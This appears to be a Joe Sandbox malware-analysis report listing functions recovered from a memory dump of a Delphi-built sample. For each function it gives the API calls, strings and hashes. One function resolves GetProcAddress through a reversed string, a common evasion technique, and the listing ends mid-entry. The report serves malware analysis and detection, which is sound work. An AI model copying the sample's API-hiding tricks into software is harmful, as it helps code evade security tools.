Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
Instruction ID: 83e43037315980094935c058db4ead9b2d3de697f127137c0c60c7b0b7ffec0e
Opcode Fuzzy Hash: c4b3f0c93823539839d01daad2c09e6f11a765adec9aabbdebd76e5b504f9237
Instruction Fuzzy Hash: 52A01280444C2041854033180C0253430445810A20FC4C74078F8402D4E91D01248093

Function 02E720C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02E7676A Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f550b5cbd48fd42d90533e24f01e6b600dca25908298db9d983e397911bd6d31
Instruction ID: 1e220376207e918058333775ec4273fea7b4f53c05172e42433df3695f24b8af
Opcode Fuzzy Hash: f550b5cbd48fd42d90533e24f01e6b600dca25908298db9d983e397911bd6d31
Instruction Fuzzy Hash:

Function 02E7D29C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E7D2A5

Part of subcall function 02E7D270: GetProcAddress.KERNEL32(00000000), ref: 02E7D289

Strings

VarAdd, xrefs: 02E7D2F5
VarSub, xrefs: 02E7D30B
VarBoolFromStr, xrefs: 02E7D43F
VarOr, xrefs: 02E7D38F
VarDiv, xrefs: 02E7D337
VarMod, xrefs: 02E7D363
VarNot, xrefs: 02E7D2DF
oleaut32.dll, xrefs: 02E7D2A0
VarIdiv, xrefs: 02E7D34D
VarR4FromStr, xrefs: 02E7D3E7
VarMul, xrefs: 02E7D321
VarBstrFromDate, xrefs: 02E7D46B
VarBstrFromCy, xrefs: 02E7D455
VarCyFromStr, xrefs: 02E7D429
VariantChangeTypeEx, xrefs: 02E7D2B3
VarI4FromStr, xrefs: 02E7D3D1
VarAnd, xrefs: 02E7D379
VarXor, xrefs: 02E7D3A5
VarCmp, xrefs: 02E7D3BB
VarNeg, xrefs: 02E7D2C9
VarR8FromStr, xrefs: 02E7D3FD
VarDateFromStr, xrefs: 02E7D413
VarBstrFromBool, xrefs: 02E7D481

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: ac6ecfc40d07811d372464b450204f4c0aa55f2e5caf9b1849be21b9fe641697
Instruction ID: f00f5edd9c7eaf11ae65b87e53b260e67a4c83836fc7126dae1bc2664bfd0b23
Opcode Fuzzy Hash: ac6ecfc40d07811d372464b450204f4c0aa55f2e5caf9b1849be21b9fe641697
Instruction Fuzzy Hash: F6412DE1AC42445B66546B6E7D02427B7EADF847307B0F01AB60CDA254EB30ACD6CB2D

Function 02E86EE5 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,CoCreateInstanceEx), ref: 02E86EF7
GetProcAddress.KERNEL32(?,CoInitializeEx), ref: 02E86F07
GetProcAddress.KERNEL32(?,CoAddRefServerProcess), ref: 02E86F17
GetProcAddress.KERNEL32(?,CoReleaseServerProcess), ref: 02E86F27
GetProcAddress.KERNEL32(?,CoResumeClassObjects), ref: 02E86F37
GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02E86F47

Strings

CoInitializeEx, xrefs: 02E86F01
CoAddRefServerProcess, xrefs: 02E86F11
CoReleaseServerProcess, xrefs: 02E86F21
CoCreateInstanceEx, xrefs: 02E86EF1
CoSuspendClassObjects, xrefs: 02E86F41
CoResumeClassObjects, xrefs: 02E86F31

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressProc
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects
API String ID: 190572456-772721778
Opcode ID: 9313acccea5c7261ea2a166798ce32a92c0f1bdc21d858e8be3ebd30955ec574
Instruction ID: d7da4d67f7f09963631bf6ad50cc83bcd33da71ae0b17e5c174302310bbc5710
Opcode Fuzzy Hash: 9313acccea5c7261ea2a166798ce32a92c0f1bdc21d858e8be3ebd30955ec574
Instruction Fuzzy Hash: 7AF0ACF09C87807DFB00FFB35C81926376EAA10718388BC5BBD4A69552E6B5A4948F11

Function 02E72530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E728CE

Strings

An unexpected memory leak has occurred. , xrefs: 02E72690
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E72849
String, xrefs: 02E727A1
Unexpected Memory Leak, xrefs: 02E728C0
, xrefs: 02E72814
The unexpected small block leaks are:, xrefs: 02E72707
Unknown, xrefs: 02E7278C
7, xrefs: 02E726A1
bytes: , xrefs: 02E7275D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 62c90d9ab9616c2b1cf15a9ea45da7d0d10fb271ffe3c48fa067ce7a4065b89c
Instruction ID: 7401086d4311bc1e99f0f4b338abb7a5b7f11a1b077cdd2a14d6691ca63a59aa
Opcode Fuzzy Hash: 62c90d9ab9616c2b1cf15a9ea45da7d0d10fb271ffe3c48fa067ce7a4065b89c
Instruction Fuzzy Hash: C4A1D430E842548BDF21AA2CCC80BD9B7E5EB09354F14A0E5EE49AB386CB7599C5CF51

Function 02E7252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

An unexpected memory leak has occurred. , xrefs: 02E72690
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E72849
Unexpected Memory Leak, xrefs: 02E728C0
, xrefs: 02E72814
The unexpected small block leaks are:, xrefs: 02E72707
7, xrefs: 02E726A1
bytes: , xrefs: 02E7275D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 7b117da8615aad5d51d70e23bc19ec261dcabb5f4cbf8cc65747e5349ae0129a
Instruction ID: d45723a9c9e2a583b332892a793cd8a5386de687f53c2fb42de8e0a8c6545d5c
Opcode Fuzzy Hash: 7b117da8615aad5d51d70e23bc19ec261dcabb5f4cbf8cc65747e5349ae0129a
Instruction Fuzzy Hash: 1F71B330E842988FDF21DA2CCC84BD9BBF5EB09704F14A0E5EA499B281DB754AC5CF51

Function 02E7BDC8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02E7C093,?,?,00000000,00000000), ref: 02E7BDFE

Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA

Strings

mmmm d, yyyy, xrefs: 02E7BEFA
m/d/yy, xrefs: 02E7BECD
AMPM, xrefs: 02E7C012
AMPM , xrefs: 02E7C021
:mm, xrefs: 02E7C031
:mm:ss, xrefs: 02E7C04E

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 053c361c303b7ff617c751e6c2280f83bb843f7068cd297e05ff7569c0f000e2
Instruction ID: 47ab6e7780c40989efe3d10f130b92a4dcd8bd66ec561166abcd566f52ce98e9
Opcode Fuzzy Hash: 053c361c303b7ff617c751e6c2280f83bb843f7068cd297e05ff7569c0f000e2
Instruction Fuzzy Hash: 0B611F34BC02889BDB04EBA4D851A9F77BBDB89300F60F839F201AB745DA35D9459F91

Function 02E8AFDC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8AFFC
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E8B013
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E8B0A7
IsBadReadPtr.KERNEL32(?,00000002), ref: 02E8B0B3
IsBadReadPtr.KERNEL32(?,00000014), ref: 02E8B0C7

Strings

KernelBase, xrefs: 02E8B00E
LoadLibraryExA, xrefs: 02E8B009

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: d82ddc0f380bacd9279c3f82a3de515422d287bbc67b6a47008cb196a7f64b08
Instruction ID: c57c8563f928d6312de242a664654cb0566582665ee013eafb4ec51f0fc7ebc2
Opcode Fuzzy Hash: d82ddc0f380bacd9279c3f82a3de515422d287bbc67b6a47008cb196a7f64b08
Instruction Fuzzy Hash: 9D312F71680605FBDB20EBA9CC85F5A77A8AF0435CF40D514FAACEB2C1D370A954CB55

Function 02E7435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8,?,?,02E9E7A8,02E765B1,02E9D30D), ref: 02E74395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8,?,?,02E9E7A8,02E765B1,02E9D30D), ref: 02E7439B
GetStdHandle.KERNEL32(000000F5,02E743E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?,02EF67C8), ref: 02E743B0
WriteFile.KERNEL32(00000000,000000F5,02E743E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E74423,?,?), ref: 02E743B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E743D4

Strings

Error, xrefs: 02E743C8
Runtime error at 00000000, xrefs: 02E7438E, 02E743CD

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: a497ed19508d3f0632d96c4bce453794114ae2fefa66cad17e1f0ee661156dad
Instruction ID: 6b6bf78d61f7fc8cabc783aa0d21eb8acbade1d9528ded09f8c4f565d13503ed
Opcode Fuzzy Hash: a497ed19508d3f0632d96c4bce453794114ae2fefa66cad17e1f0ee661156dad
Instruction Fuzzy Hash: 8CF0B460AC434475FB10F3A07C46F5E276C4785F25F54EA17B32C9C0C08BA440C48B32

Function 02E7AECC Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02E7AD44: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E7AD61
Part of subcall function 02E7AD44: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E7AD85
Part of subcall function 02E7AD44: GetModuleFileNameA.KERNEL32(02E70000,?,00000105), ref: 02E7ADA0
Part of subcall function 02E7AD44: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E7AE36

CharToOemA.USER32(?,?), ref: 02E7AF03
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF20
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF26
GetStdHandle.KERNEL32(000000F4,02E7AF90,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF3B
WriteFile.KERNEL32(00000000,000000F4,02E7AF90,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E7AF41
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E7AF63
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E7AF79

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 535bfaab7c94115b1b62ea48a552cce3b1c07fdb699cbfecbe8f0afce8e96bad
Instruction ID: d35361a61c5a0fb295a8346d7128b4d4d921724dc1d38086d5079f4f5933b19b
Opcode Fuzzy Hash: 535bfaab7c94115b1b62ea48a552cce3b1c07fdb699cbfecbe8f0afce8e96bad
Instruction Fuzzy Hash: D7115EB25D4300AFE200FBA5CC85F9F77AEAB45704F809929BB54D61E0DB74E9448F62

Function 02E7E594 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E7E62D
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E7E649
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E7E682
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E7E6FF
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E7E718
VariantCopy.OLEAUT32(?,00000000), ref: 02E7E74D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 333ae87848f14f9be3273540aa041970453cf7f135bb8a03886c97f604cbff88
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 0A51EA7594062D9BDB22DB98CC80BD9B3BDAF49304F4491D9F609EB241DB30AF858F61

Function 02E73598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E735BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E73609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E735ED
RegCloseKey.ADVAPI32(?,02E73610,00000000,?,00000004,00000000,02E73609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E73603

Strings

FPUMaskValue, xrefs: 02E735E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02E735B0

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 87c90e325fed2ac077c897e11aafad218b2dd5079185383613f33415a2e3934c
Instruction ID: 4d61e329694ac991aa2ac6f2bb58a4c77be88d009a5486ced2d2c3c0f6975fcb
Opcode Fuzzy Hash: 87c90e325fed2ac077c897e11aafad218b2dd5079185383613f33415a2e3934c
Instruction Fuzzy Hash: 9901B1759C0358BAEB11EBD19D02BB977ECDB08B00F5085A3BA04D6680E674AA10EA59

Function 02E8827C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
GetProcAddress.KERNEL32(?,?), ref: 02E882E1

Strings

Kernel32, xrefs: 02E882C4
sserddAcorPteG, xrefs: 02E88297

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: d2e3fec4016e86c76f9ce49cd42a8e23877dc28834d05fd27aa5430406b1c557
Instruction ID: d62610b56f7a1e71f722e01ed2fb4ed9150c0dbc8d0060ae7f10a1e7f0981ff5
Opcode Fuzzy Hash: d2e3fec4016e86c76f9ce49cd42a8e23877dc28834d05fd27aa5430406b1c557
Instruction Fuzzy Hash: EA014F786C4308BFEB04EFA4DC41E5AB7BEEB48B10F91E860F908D7640D630A950CA14

Function 02E7AA58 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E7AAEF,?,?,00000000), ref: 02E7AA70

Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E7AAEF,?,?,00000000), ref: 02E7AAA0
EnumCalendarInfoA.KERNEL32(Function_0000A9A4,00000000,00000000,00000004), ref: 02E7AAAB
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E7AAEF,?,?,00000000), ref: 02E7AAC9
EnumCalendarInfoA.KERNEL32(Function_0000A9E0,00000000,00000000,00000003), ref: 02E7AAD4

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 6afd60a8f88fd9b111f6ebac4371301576d0b1052961342f3503bb1a0325facf
Instruction ID: 35abfcafbf05f527efa1aa0588cebfa05a90bcb3a17e007c4dbecc42478b43b7
Opcode Fuzzy Hash: 6afd60a8f88fd9b111f6ebac4371301576d0b1052961342f3503bb1a0325facf
Instruction Fuzzy Hash: 0201F2B12C0A446FFA11FBA4DC12F6F725EDB81724FA1E530F501967C0E6759E008EA5

Function 02E7AB08 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E7ACD8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E7AB37

Part of subcall function 02E7A7CC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E7A7EA

Strings

eeee, xrefs: 02E7AC46
ggg, xrefs: 02E7AC1D
yyyy, xrefs: 02E7AC2D

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
